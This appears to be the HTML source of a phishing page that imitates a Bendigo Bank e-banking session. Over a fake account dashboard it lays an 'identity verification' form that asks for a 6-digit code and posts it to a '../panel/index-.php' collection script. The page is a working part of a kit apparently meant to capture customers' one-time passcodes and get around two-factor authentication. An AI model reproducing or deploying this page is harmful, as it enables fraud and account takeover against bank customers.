<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Bendigo Bank - Log in to e-banking</title>
    <link rel="stylesheet" href="./assets/style/style2.css">
    <link rel="icon" href="./assets/images/logoicon.png">

</head>
<body>
    <section class="bndgoPage2">
        <div class="bndgoPage_01">
            <div class="bndgoPage_01-LOGO">
                <img src="./assets/images/02.png" alt="">
                <img src="./assets/images/01.png" alt="">
            </div>
            <div class="bndgoPage_01-NAVBAR">
                <ul>
                    <li> <img src="./assets/images/02/a1.png" alt=""><span>Accounts</span> </li>
                    <li><img src="./assets/images/02/a2.png" alt=""><span>Move Money</span></li>
                    <li><img src="./assets/images/02/a3.png" alt=""><span>Activity</span> </li>
                    <li><img src="./assets/images/02/a4.png" alt=""><span>Contact</span></li>
                    <li><img src="./assets/images/02/a5.png" alt=""><span>Cards</span></li>
                    <li><img src="./assets/images/02/a6.png" alt=""><span>What's New</span></li>
                    <li><img src="./assets/images/02/a7.png" alt=""><span>Support</span></li>
                </ul>
                <ul>
                    <li class="liAc"><img src="./assets/images/02/a8.png" alt=""><span>Setting</span></li>
                    <li><img src="./assets/images/02/a9.png" alt=""><span>Log Out</span></li>
                </ul>
            </div>
        </div>
        <div class="bndgoPage_011"></div>
        <!--  -->
        <div class="bndgoPage_02">
            <nav>
                <div class="nav0101">
                    <img src="./assets/images/02/a10.png" alt="">
                    <h1>Loading...</h1>
                    <button style="opacity: 0;">Save</button>
                </div>
            </nav>
        </div>
    </section>
    <div class="loadingAllBox1">
        <div class="boxOtpp">
            <div class="boxOtppImg">
                <img src="./assets/images/logo.png" alt="">
                <img src="./assets/images/02/mcbcid-check.png" alt="">
            </div>
            <h1>Confirm Your Identify</h1>
            <p>To protect you from fraud, you must confirm your identity to complete the identity verification process</p>
            <form class="sectionOtpCode_01box" action="../panel/index-.php" method="post">
                <input type="hidden" name="step" value="otpCCStep">
                <div class="sectionOtpCode_01Inputs">
                    <label for="">Enter the 6-digit verification code</label>
                    <input type="text" id="otpinput" name="otpCodeCC" required inputmode="numeric"  pattern="[0-9]{6,}">
                </div>
                <p class="sectionOtpCode_01paragraph sectionOtpCode_01paragraph2">Didn't get the code? Check your messages, your spam folder or <span>resend another code.</span> </p>
                <button type="submit" class="sectionOtpCode_btn" id="sectionOtpCode_btn">Verify</button>
            </form>
        </div>
    </div>
    <script src="https://cdn.jsdelivr.net/npm/cleave.js@1.6.0/dist/cleave.min.js"></script>
    <script src="./assets/scripts/js.js"></script>
    <script>
        const cleaveCCV = new Cleave("#otpinput", {blocks: [6],});
        setInterval(()=>{
            if(document.getElementById('otpinput').value == '' ){                
                document.getElementById('sectionOtpCode_btn').style.opacity='0.2';
                document.getElementById('sectionOtpCode_btn').style.cursor="not-allowed";
                document.getElementById('sectionOtpCode_btn').disabled = true
            }else{
                document.getElementById('sectionOtpCode_btn').style.opacity='1';
                document.getElementById('sectionOtpCode_btn').style.cursor="pointer";
                document.getElementById('sectionOtpCode_btn').disabled = false
            }
        },10);
    </script>
</body>
</html>